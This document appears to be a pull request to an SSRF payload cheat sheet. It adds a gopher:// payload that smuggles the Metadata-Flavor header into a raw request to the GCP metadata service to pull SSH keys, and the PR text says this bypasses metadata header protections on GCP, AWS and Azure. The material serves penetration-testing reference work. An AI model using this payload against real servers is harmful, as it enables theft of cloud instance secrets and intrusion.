### PR TITLE
Added anti-SSRF header bypass for GCP

### DIFF
--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -504,7 +504,8 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 Required headers can be set using a gopher SSRF with the following technique
 
 ```powershell
-gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a``
+gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a
+```
 
 Interesting files to pull out:
 

--- a/Server Side Request Forgery/README.md
+++ b/Server Side Request Forgery/README.md
@@ -501,6 +501,11 @@ http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```
 
+Required headers can be set using a gopher SSRF with the following technique
+
+```powershell
+gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a``
+
 Interesting files to pull out:
 
 - SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`


### PR DESCRIPTION
The gopher directive can be used to pass headers, bypassing header security measures for GCP/AWS/Azure.  Although this is somewhat covered in the Gopher HTTP proxy section, I think this clarifies it a bit.